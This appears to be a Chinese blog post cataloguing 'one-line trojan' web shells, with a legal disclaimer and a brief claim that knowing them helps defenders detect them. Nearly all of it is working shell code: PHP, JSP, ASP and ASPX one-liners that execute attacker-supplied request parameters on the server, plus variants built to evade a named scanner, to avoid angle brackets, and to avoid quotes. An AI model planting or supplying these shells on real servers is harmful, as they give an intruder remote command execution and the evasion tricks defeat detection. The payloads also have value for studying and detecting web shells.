网络安全-一句话木马

声明

遵纪守法
请严格遵守网络安全法相关条例！
此分享主要用于交流学习，请勿用于非法用途，一切后果自付。
一切未经授权的网络攻击均为违法行为，互联网非法外之地。

反制

大家在知道了常规一句话的木马之后，就可以通过关键字或者更高级的方式来查看服务器是否存在木马。不知攻、焉知防。

最经典的 php一句话

<?php eval(@$_POST['cmd']); ?>

php7中此命令是不行的，可以拼接命令绕过。这也显示了攻防的对抗和进化。

<?php $p = $_POST['cmd'];@eval($p);
?>

jsp一句话：

  <%Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
//    System.out.println(process);InputStream inputStream = process.getInputStream();BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));String line;while ((line = bufferedReader.readLine()) != null){response.getWriter().println(line);}%>

images

<!--#include file="images\1.jpg" --><%eval request("3")%><%execute request("3")%><%execute(request("3"))%><%If Request("3")<>"" Then Execute(Request("3"))%><%if request ("3")<>""then session("3")=request("3"):end if:if session("3")<>"" then execute session("3")%><SCRIPT language=VBScript runat="server">execute request("3")</SCRIPT><%@ Page Language="Jscript"%><%eval(Request.Item["3"],"unsafe");%>

asp一句话

<%execute(request("3"))%>

aspx一句话

<script language="C#" runat="server">
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
</script>

可以躲过雷客图的一句话。

<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>

不用'<,>'的asp一句话

<script language=VBScript runat=server>execute request("1")</script>

不用双引号的一句话。

<%eval request(chr(35))%>

参考：

lcx.cc